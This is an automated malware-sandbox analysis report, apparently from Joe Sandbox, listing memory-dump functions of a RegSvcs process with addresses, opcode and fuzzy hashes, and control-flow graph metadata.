                                                                                    • Source File: 0000000E.00000002.628958946.00000000003C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 003C0000, based on PE: false
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_14_2_3c0000_RegSvcs.jbxd
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID:
                                                                                    • API String ID:
                                                                                    • Opcode ID: 6ca25afb83f8fed5c9e32f98855e22d3a33c1cb8afbbcbb4fd3c4102c7343c1a
                                                                                    • Instruction ID: 7f41cdbb6604bc46e4abde75c7fc8a930542b4796c3f0da5e2860ba10cf1418c
                                                                                    • Opcode Fuzzy Hash: 6ca25afb83f8fed5c9e32f98855e22d3a33c1cb8afbbcbb4fd3c4102c7343c1a
                                                                                    • Instruction Fuzzy Hash: CDA17D74A01228CFDB65DF24C894B9DBBB2BF8A301F5085EAD409A7250DB35AEC5CF51
                                                                                    Function 003C584B Relevance: .1, Instructions: 116COMMON
                                                                                    Download Yara Rule
                                                                                    Memory Dump Source
                                                                                    • Source File: 0000000E.00000002.628958946.00000000003C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 003C0000, based on PE: false
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_14_2_3c0000_RegSvcs.jbxd
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID:
                                                                                    • API String ID:
                                                                                    • Opcode ID: cd0bacf583a5b74c43c865086e630f6ae5dc7d2cdfb01f784f5fe7e07afd6c77
                                                                                    • Instruction ID: 05cdb822c56e0c7dc39836ea9402cd36e8f111771146345ccd2698424d2409c3
                                                                                    • Opcode Fuzzy Hash: cd0bacf583a5b74c43c865086e630f6ae5dc7d2cdfb01f784f5fe7e07afd6c77
                                                                                    • Instruction Fuzzy Hash: 4B516374A01228CFDB65DF24C994BADBBB2BF4A305F5085EAD409A7350DB35AE81CF50
                                                                                    Function 004C79AE Relevance: .0, Instructions: 17COMMON
                                                                                    Download Yara Rule
                                                                                    Memory Dump Source
                                                                                    • Source File: 0000000E.00000002.629297965.00000000004C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 004C0000, based on PE: false
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_14_2_4c0000_RegSvcs.jbxd
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID:
                                                                                    • API String ID:
                                                                                    • Opcode ID: f2d5152b5b022788b40fa947361ae80f10e6b9415f352c2187e45d2b459d31a0
                                                                                    • Instruction ID: 52c54caf8b0271c09c536bcf055921178cf0f68633a5e9df5a469f4dd525b6f5
                                                                                    • Opcode Fuzzy Hash: f2d5152b5b022788b40fa947361ae80f10e6b9415f352c2187e45d2b459d31a0
                                                                                    • Instruction Fuzzy Hash: 95D06778D042589BCB50DFA4D8417AEB3B5BB96214F1068E68509A7204D7359A518E46

                                                                                    Execution Graph

                                                                                    Execution Coverage:13.9%
                                                                                    Dynamic/Decrypted Code Coverage:100%
                                                                                    Signature Coverage:0%
                                                                                    Total number of Nodes:18
                                                                                    Total number of Limit Nodes:0
                                                                                    execution_graph 11407 2d4720 11408 2d472c 11407->11408 11411 2d78cb 11408->11411 11409 2d47e0 11413 2d78f2 11411->11413 11412 2d7cd9 11412->11409 11413->11412 11417 2dfcad 11413->11417 11421 2dfe53 11413->11421 11425 2dfcb8 11413->11425 11419 2dfcdf 11417->11419 11418 2dfe0a KiUserExceptionDispatcher 11420 2dfdfb 11418->11420 11419->11418 11419->11420 11420->11413 11422 2dfd17 11421->11422 11423 2dfe0a KiUserExceptionDispatcher 11422->11423 11424 2dfdfb 11422->11424 11423->11424 11424->11413 11427 2dfcdf 11425->11427 11426 2dfe0a KiUserExceptionDispatcher 11428 2dfdfb 11426->11428 11427->11426 11427->11428 11428->11413

                                                                                    Executed Functions

                                                                                    Function 00445E58 Relevance: .7, Instructions: 745COMMON
                                                                                    Download Yara Rule

                                                                                    Control-flow Graph

                                                                                    • Executed
                                                                                    • Not Executed
                                                                                    control_flow_graph 1186 445e58-445e78 1187 445e7f-445ef7 1186->1187 1188 445e7a 1186->1188 1192 445f44-445f96 1187->1192 1193 445ef9-445f3f 1187->1193 1188->1187 1200 445fdd-4460c1 1192->1200 1201 445f98-445fdc 1192->1201 1193->1200 1213 446c76-446cab 1200->1213 1214 4460c7-4461c9 1200->1214 1201->1200 1224 446c69-446c6f 1214->1224 1225 446c75 1224->1225 1226 4461ce-4462ab 1224->1226 1225->1213 1234 4462b2-44631a 1226->1234 1235 4462ad 1226->1235 1239 446321-446332 1234->1239 1240 44631c 1234->1240 1235->1234 1241 4463be-4464c4 1239->1241 1242 446338-446342 1239->1242 1240->1239 1260 4464c6 1241->1260 1261 4464cb-446533 1241->1261 1243 446344 1242->1243 1244 446349-4463bd 1242->1244 1243->1244 1244->1241 1260->1261 1265 446535 1261->1265 1266 44653a-44654b 1261->1266 1265->1266 1267 4465d7-44678a 1266->1267 1268 446551-44655b 1266->1268 1289 446791-44680e 1267->1289 1290 44678c 1267->1290 1269 446562-4465d6 1268->1269 1270 44655d 1268->1270 1269->1267 1270->1269 1294 446815-446826 1289->1294 1295 446810 1289->1295 1290->1289 1296 4468b2-44694b 1294->1296 1297 44682c-446836 1294->1297 1295->1294 1307 446952-4469c9 1296->1307 1308 44694d 1296->1308 1298 44683d-4468b1 1297->1298 1299 446838 1297->1299 1298->1296 1299->1298 1315 4469d0-4469e1 1307->1315 1316 4469cb 1307->1316 1308->1307 1317 4469e7-446a7b 1315->1317 1318 446ace-446b62 1315->1318 1316->1315 1332 446a82-446acd 1317->1332 1333 446a7d 1317->1333 1327 446c54-446c5f 1318->1327 1328 446b68-446c53 1318->1328 1330 446c66 1327->1330 1331 446c61 1327->1331 1328->1327 1330->1224 1331->1330 1332->1318 1333->1332
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000017.00000002.629236905.0000000000440000.00000040.00000800.00020000.00000000.sdmp, Offset: 00440000, based on PE: false
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_23_2_440000_RegSvcs.jbxd
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID:
                                                                                    • API String ID:
                                                                                    • Opcode ID: 19ec9bc7a0cd44b2057b870e932fa23df218452142455da1725fed6593188c2f
                                                                                    • Instruction ID: 94e8f90988e333951b6d393926ff7655f8e8794192f1f0aa544fe75a21edbf52
                                                                                    • Opcode Fuzzy Hash: 19ec9bc7a0cd44b2057b870e932fa23df218452142455da1725fed6593188c2f
                                                                                    • Instruction Fuzzy Hash: 47827174E012288FEB64DF69C894BDDBBB2AB89300F1081EAD50DA7355DB759E81CF40
                                                                                    Function 0044C480 Relevance: .3, Instructions: 268COMMON
                                                                                    Download Yara Rule

                                                                                    Control-flow Graph

                                                                                    • Executed
                                                                                    • Not Executed
                                                                                    control_flow_graph 2211 44c480-44c4a0 2212 44c4a7-44c538 2211->2212 2213 44c4a2 2211->2213 2217 44c882-44c8b4 2212->2217 2218 44c53e-44c587 2212->2218 2213->2212 2224 44c58e-44c597 2218->2224 2225 44c589 2218->2225 2226 44c875-44c87b 2224->2226 2225->2224 2227 44c881 2226->2227 2228 44c59c-44c612 call 440288 2226->2228 2227->2217 2234 44c6ce-44c728 2228->2234 2235 44c618-44c686 2228->2235 2246 44c729-44c777 2234->2246 2244 44c688-44c6c8 2235->2244 2245 44c6c9-44c6cc 2235->2245 2244->2245 2245->2246 2251 44c860-44c86b 2246->2251 2252 44c77d-44c85f 2246->2252 2253 44c872 2251->2253 2254 44c86d 2251->2254 2252->2251 2253->2226 2254->2253
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000017.00000002.629236905.0000000000440000.00000040.00000800.00020000.00000000.sdmp, Offset: 00440000, based on PE: false
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_23_2_440000_RegSvcs.jbxd
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID:
                                                                                    • API String ID:
                                                                                    • Opcode ID: 1d7dc2e7f19130468f7fcf03e219d6dba0fb34cbbe909a7152267b4ec08cb806
                                                                                    • Instruction ID: 00ea969dec8e90ec197e61271dc77261b5cb3a377bbc4a41d671f8be9ce4449c
                                                                                    • Opcode Fuzzy Hash: 1d7dc2e7f19130468f7fcf03e219d6dba0fb34cbbe909a7152267b4ec08cb806
                                                                                    • Instruction Fuzzy Hash: B0C1E674E01218CFDB54DFA5C994BADBBB2BF89300F2480AAD409AB395DB355E81CF54
                                                                                    Function 0044F460 Relevance: .2, Instructions: 219COMMON
                                                                                    Download Yara Rule
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000017.00000002.629236905.0000000000440000.00000040.00000800.00020000.00000000.sdmp, Offset: 00440000, based on PE: false
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_23_2_440000_RegSvcs.jbxd
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID:
                                                                                    • API String ID:
                                                                                    • Opcode ID: d2a36fd05ba9cec792cf2847067be43eae317b6960908cff7c53d0a42fbb969d
                                                                                    • Instruction ID: 6d1990dd2df39361ced776a63e669f1a9c82418bc5ffee2dcfdc7c19bbf99a9b
                                                                                    • Opcode Fuzzy Hash: d2a36fd05ba9cec792cf2847067be43eae317b6960908cff7c53d0a42fbb969d
                                                                                    • Instruction Fuzzy Hash: 10A1A575E012188FEB68DF6AC944B9EFBF2AF89300F14C0AAD40CA7255DB345A85CF55
                                                                                    Function 0044EE10 Relevance: .2, Instructions: 219COMMON
                                                                                    Download Yara Rule
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000017.00000002.629236905.0000000000440000.00000040.00000800.00020000.00000000.sdmp, Offset: 00440000, based on PE: false
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_23_2_440000_RegSvcs.jbxd
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID:
                                                                                    • API String ID:
                                                                                    • Opcode ID: ce7f4f1bb6181f29b0db3d0a204b504256a0b0f3a0b991414fd49d70c02818a6
                                                                                    • Instruction ID: 1432f099e96f4361b7ef1dd47e606dfeefc48eed8b9a90b765b281d86de5f15e
                                                                                    • Opcode Fuzzy Hash: ce7f4f1bb6181f29b0db3d0a204b504256a0b0f3a0b991414fd49d70c02818a6
                                                                                    • Instruction Fuzzy Hash: A8A19474E012188FEB68DF6AC944B9EFBF2AF89300F14C1AAD40CA7255DB345A85CF55
                                                                                    Function 0044E7C0 Relevance: .2, Instructions: 219COMMON
                                                                                    Download Yara Rule
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000017.00000002.629236905.0000000000440000.00000040.00000800.00020000.00000000.sdmp, Offset: 00440000, based on PE: false
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_23_2_440000_RegSvcs.jbxd
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID:
                                                                                    • API String ID:
                                                                                    • Opcode ID: 763c87da0695e636e8091eb552389c103610b4465563eb56127227ab01c06f73
                                                                                    • Instruction ID: b49df81d7d8536049a0d18e017d8e3c3efbee92b62eeaef9e476e24698b8898c
                                                                                    • Opcode Fuzzy Hash: 763c87da0695e636e8091eb552389c103610b4465563eb56127227ab01c06f73
                                                                                    • Instruction Fuzzy Hash: CEA1A474E012188FEB68DF6AC944B9EBBF2BF89300F14C0AAD40DA7255DB345A85CF15
                                                                                    Function 0044D4E0 Relevance: .2, Instructions: 219COMMON
                                                                                    Download Yara Rule
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000017.00000002.629236905.0000000000440000.00000040.00000800.00020000.00000000.sdmp, Offset: 00440000, based on PE: false
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_23_2_440000_RegSvcs.jbxd
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID:
                                                                                    • API String ID:
                                                                                    • Opcode ID: 0502d7087ce0c67285de67d62e975aa513ac79fb62ffd5a129a9e93a6f3cc2d8
                                                                                    • Instruction ID: 85865c1a3db689e6ebecca1cfbc7fcad4dbff5d79fc5041b9c23f2b53298a682
                                                                                    • Opcode Fuzzy Hash: 0502d7087ce0c67285de67d62e975aa513ac79fb62ffd5a129a9e93a6f3cc2d8
                                                                                    • Instruction Fuzzy Hash: B8A19574E012288FEB68DF6AC944B9DFBF2AF89300F14C0AAD40DA7255DB345A85CF55
                                                                                    Function 00560CD8 Relevance: .2, Instructions: 219COMMON
                                                                                    Download Yara Rule
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000017.00000002.629341790.0000000000560000.00000040.00000800.00020000.00000000.sdmp, Offset: 00560000, based on PE: false
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_23_2_560000_RegSvcs.jbxd
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID:
                                                                                    • API String ID:
                                                                                    • Opcode ID: 8c4676efe5639f4ac6859604cd768f39c40e81bbc5093b6fbcf68325a9894117
                                                                                    • Instruction ID: eba49955745c24d740ff3445a39ea3e6bb9da8da5dfe66925dc06f6cc0916802
                                                                                    • Opcode Fuzzy Hash: 8c4676efe5639f4ac6859604cd768f39c40e81bbc5093b6fbcf68325a9894117
                                                                                    • Instruction Fuzzy Hash: D4A1A374E012288FEB68CF6AC944B9EFBF2BB89300F14D4AAD40DA7251D7345A85CF50
                                                                                    Function 00560040 Relevance: .2, Instructions: 219COMMON
                                                                                    Download Yara Rule
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000017.00000002.629341790.0000000000560000.00000040.00000800.00020000.00000000.sdmp, Offset: 00560000, based on PE: false
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_23_2_560000_RegSvcs.jbxd
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID:
                                                                                    • API String ID:
                                                                                    • Opcode ID: 7a313a2731455b153001700b66228c25954dee951d49d1693f1e9db87165fbbb
                                                                                    • Instruction ID: 3d35a8e843e51ba9549477ff6f7bb8665911b10948b66b94d91a90931f2a8d1a
                                                                                    • Opcode Fuzzy Hash: 7a313a2731455b153001700b66228c25954dee951d49d1693f1e9db87165fbbb
                                                                                    • Instruction Fuzzy Hash: A4A19774E012188FEB68DF6AC944B9EBBF2BF89300F14D4AAD40CA7255DB345A85CF51
                                                                                    Function 0044E178 Relevance: .2, Instructions: 218COMMON
                                                                                    Download Yara Rule
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000017.00000002.629236905.0000000000440000.00000040.00000800.00020000.00000000.sdmp, Offset: 00440000, based on PE: false
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_23_2_440000_RegSvcs.jbxd
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID:
                                                                                    • API String ID:
                                                                                    • Opcode ID: bc599beaded63e69fa14bf0b1369b8c2ce0a261a9ad472f816db22c932818357
                                                                                    • Instruction ID: 8362c490c5e0de6e014a2704a85ca39b19a3d21c360a9a6a33f37ed1341bc958
                                                                                    • Opcode Fuzzy Hash: bc599beaded63e69fa14bf0b1369b8c2ce0a261a9ad472f816db22c932818357
                                                                                    • Instruction Fuzzy Hash: 68A19474E012288FEB28DF6AC944B9EFBF2BF89300F14C0AAD408A7255D7345A85CF55
                                                                                    Function 0044DB30 Relevance: .2, Instructions: 218COMMON
                                                                                    Download Yara Rule
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000017.00000002.629236905.0000000000440000.00000040.00000800.00020000.00000000.sdmp, Offset: 00440000, based on PE: false
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_23_2_440000_RegSvcs.jbxd
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID:
                                                                                    • API String ID:
                                                                                    • Opcode ID: 30bcb0009f8a4bb4b361a8400c6b7f361580135c707ae04a5b4acc727b17b83e
                                                                                    • Instruction ID: ac0aba97ffe3277995abfcccb91536753113802b0621987684a02a3b68f0781e
                                                                                    • Opcode Fuzzy Hash: 30bcb0009f8a4bb4b361a8400c6b7f361580135c707ae04a5b4acc727b17b83e
                                                                                    • Instruction Fuzzy Hash: 75A1A474E012288FEB68DF6AC944B9DFBF2AF89300F14C0AAD40DA7255DB345A85CF55
                                                                                    Function 00560690 Relevance: .2, Instructions: 218COMMON
                                                                                    Download Yara Rule
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000017.00000002.629341790.0000000000560000.00000040.00000800.00020000.00000000.sdmp, Offset: 00560000, based on PE: false
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_23_2_560000_RegSvcs.jbxd
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID:
                                                                                    • API String ID:
                                                                                    • Opcode ID: 51a620a32ae971d23a4387732f0b900bae37448328372f3371a4ece520f2fdf3
                                                                                    • Instruction ID: e12246fd63498b3b76f40c25dcbc444a33c2d0630c0fe5157085ac05f1280407
                                                                                    • Opcode Fuzzy Hash: 51a620a32ae971d23a4387732f0b900bae37448328372f3371a4ece520f2fdf3
                                                                                    • Instruction Fuzzy Hash: 13A19574E012288FEB68DF6AC944B9EBBF2BF89300F14D1AAD40DA7251D7345A85CF50
                                                                                    Function 00560006 Relevance: .1, Instructions: 125COMMON
                                                                                    Download Yara Rule
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000017.00000002.629341790.0000000000560000.00000040.00000800.00020000.00000000.sdmp, Offset: 00560000, based on PE: false
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_23_2_560000_RegSvcs.jbxd
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID:
                                                                                    • API String ID:
                                                                                    • Opcode ID: cfa5f6400c0606620ba04dfa0af7a2698a1900daa2ab248706007b739eddb7f9
                                                                                    • Instruction ID: 21f837cda4cdf6d83f185ffe4b77fdf80a2719145c7842315f870ecc8d7de46c
                                                                                    • Opcode Fuzzy Hash: cfa5f6400c0606620ba04dfa0af7a2698a1900daa2ab248706007b739eddb7f9
                                                                                    • Instruction Fuzzy Hash: 12519671D056588FEB59CF6B8D5479ABBF2AFC9200F18C1EAC44CA6265DB340A86CF11
                                                                                    Function 002DFCB8 Relevance: 1.6, APIs: 1, Instructions: 124COMMON
                                                                                    Download Yara Rule

                                                                                    Control-flow Graph

                                                                                    • Executed
                                                                                    • Not Executed
                                                                                    control_flow_graph 1106 2dfcb8-2dfcdd 1107 2dfcdf 1106->1107 1108 2dfce4-2dfd4b 1106->1108 1107->1108 1113 2dfdd5-2dfddb 1108->1113 1114 2dfde1-2dfdf9 1113->1114 1115 2dfd50-2dfd63 1113->1115 1116 2dfdfb-2dfe08 1114->1116 1117 2dfe0a-2dfe2a KiUserExceptionDispatcher 1114->1117 1118 2dfd6a-2dfda6 1115->1118 1119 2dfd65 1115->1119 1120 2dfe2c-2dff07 1116->1120 1117->1120 1128 2dfdb9-2dfdcb 1118->1128 1129 2dfda8-2dfdb6 1118->1129 1119->1118 1123 2dff0f-2dff18 1120->1123 1124 2dff09-2dff0e 1120->1124 1124->1123 1132 2dfdcd 1128->1132 1133 2dfdd2 1128->1133 1129->1114 1132->1133 1133->1113
                                                                                    APIs
                                                                                    • KiUserExceptionDispatcher.NTDLL(000000FF), ref: 002DFE1A
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000017.00000002.628915637.00000000002D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 002D0000, based on PE: false
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_23_2_2d0000_RegSvcs.jbxd
                                                                                    Similarity
                                                                                    • API ID: DispatcherExceptionUser
                                                                                    • String ID:
                                                                                    • API String ID: 6842923-0
                                                                                    • Opcode ID: 8287cc734514daa22299757a441ae0777e2c5dbbc1ac834b93e63d38be93924e
                                                                                    • Instruction ID: c220383bdedada44591a658b1eafa6ecbaeb12fd06640bb1f464e843ef2ba96d
                                                                                    • Opcode Fuzzy Hash: 8287cc734514daa22299757a441ae0777e2c5dbbc1ac834b93e63d38be93924e
                                                                                    • Instruction Fuzzy Hash: A75132B4D11208CFDB18CFAAD9886DDBBB2BF88314F20C12AE415AB394D7749945CF54
                                                                                    Function 002DFE53 Relevance: 1.6, APIs: 1, Instructions: 122COMMON
                                                                                    Download Yara Rule

                                                                                    Control-flow Graph

                                                                                    • Executed
                                                                                    • Not Executed
                                                                                    control_flow_graph 1134 2dfe53-2dfe5d 1135 2dfe5f-2dfe67 1134->1135 1136 2dfe69-2dfe6c 1134->1136 1137 2dfe6f-2dfe75 1135->1137 1136->1137 1138 2dfe7e-2dfe7f 1137->1138 1139 2dfe77 1137->1139 1141 2dfeee-2dfefb 1138->1141 1139->1138 1140 2dfe32-2dfe44 1139->1140 1142 2dfe4d-2dfe4e 1140->1142 1143 2dfe46 1140->1143 1161 2dff03-2dff07 1141->1161 1142->1141 1143->1138 1143->1140 1143->1142 1144 2dfe2c-2dfe2d 1143->1144 1145 2dfda8-2dfdb2 1143->1145 1146 2dfe0a-2dfe2a KiUserExceptionDispatcher 1143->1146 1147 2dfd24-2dfd2b 1143->1147 1148 2dfde1-2dfdf9 1143->1148 1149 2dfdb8 1143->1149 1150 2dfdfb-2dfe08 1143->1150 1151 2dfdba-2dfdcb 1143->1151 1152 2dfdb5-2dfdb6 1143->1152 1153 2dfd17-2dfd1d 1143->1153 1154 2dfd50-2dfd63 1143->1154 1155 2dfd32-2dfd4b 1143->1155 1144->1161 1145->1152 1146->1144 1147->1155 1148->1146 1148->1150 1157 2dfdb9 1149->1157 1150->1144 1162 2dfdcd 1151->1162 1163 2dfdd2 1151->1163 1152->1148 1153->1147 1159 2dfd6a-2dfda6 1154->1159 1160 2dfd65 1154->1160 1158 2dfdd5-2dfddb 1155->1158 1157->1151 1158->1148 1158->1154 1159->1145 1159->1157 1160->1159 1164 2dff0f-2dff18 1161->1164 1165 2dff09-2dff0e 1161->1165 1162->1163 1163->1158 1165->1164
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000017.00000002.628915637.00000000002D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 002D0000, based on PE: false
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_23_2_2d0000_RegSvcs.jbxd
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID:
                                                                                    • API String ID:
                                                                                    • Opcode ID: 18f9c045bc44fa14e79eda8cfcfe5318957ff0c20c40c1aa54939aaae7d239ed
                                                                                    • Instruction ID: 50200ae080a91755254cdbfdc44e62a49734f6c1f696ab9c8e62581ba61d9091
                                                                                    • Opcode Fuzzy Hash: 18f9c045bc44fa14e79eda8cfcfe5318957ff0c20c40c1aa54939aaae7d239ed
                                                                                    • Instruction Fuzzy Hash: DF511274D21208CFCB50CFA9D5846DCBBB6BF49314F20952AE416BB3A5D3749885CF18
                                                                                    Function 0044CF30 Relevance: .1, Instructions: 111COMMON
                                                                                    Download Yara Rule
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000017.00000002.629236905.0000000000440000.00000040.00000800.00020000.00000000.sdmp, Offset: 00440000, based on PE: false
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_23_2_440000_RegSvcs.jbxd
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID:
                                                                                    • API String ID:
                                                                                    • Opcode ID: e5b0532ca95b8099e65aea27b3ffb390a48790a06dc2fbd7e1586b0eb10d27cd
                                                                                    • Instruction ID: e02e4138fed40bd84f206eec2b9ef67fcf3efc02cbe61a4099a19263bdbbf73b
                                                                                    • Opcode Fuzzy Hash: e5b0532ca95b8099e65aea27b3ffb390a48790a06dc2fbd7e1586b0eb10d27cd
                                                                                    • Instruction Fuzzy Hash: CC41A078D01208CFDB44DFA5E5987EEBBB2BF88310F14912AE815A7394DB386946CF54
                                                                                    Function 0028D044 Relevance: .1, Instructions: 72COMMON
                                                                                    Download Yara Rule
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000017.00000002.628812672.000000000028D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0028D000, based on PE: false
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_23_2_28d000_RegSvcs.jbxd
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID:
                                                                                    • API String ID:
                                                                                    • Opcode ID: 04489bd8ec35d3c5c0d752ba1380b491d35a3393e7dcb521c605d42ef50d98b4
                                                                                    • Instruction ID: f077bd18c8332db49c93bfdd97166241ea8fcdaeaf9cb0d23ee72aa20a9257eb
                                                                                    • Opcode Fuzzy Hash: 04489bd8ec35d3c5c0d752ba1380b491d35a3393e7dcb521c605d42ef50d98b4
                                                                                    • Instruction Fuzzy Hash: 67210779614244EFDB14DF20C8C4B16BB65EB84314F30C569E8494B2C2C776D86BDB61
                                                                                    Function 0028D03F Relevance: .1, Instructions: 53COMMON
                                                                                    Download Yara Rule
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000017.00000002.628812672.000000000028D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0028D000, based on PE: false
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_23_2_28d000_RegSvcs.jbxd
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID:
                                                                                    • API String ID:
                                                                                    • Opcode ID: 9166c7a4dd2eec6ce831343740cf9da501b323eca94e9702a4ab88c0cd9770f2
                                                                                    • Instruction ID: 2a2a22c78b164cd21b9e2043b333d604fc6c4671a96b32c724e38193f788a762
                                                                                    • Opcode Fuzzy Hash: 9166c7a4dd2eec6ce831343740cf9da501b323eca94e9702a4ab88c0cd9770f2
                                                                                    • Instruction Fuzzy Hash: DE119D79504284DFDB11DF10D9C4B15BFB1FB84314F24C6AAD8494B696C33AD85ACFA2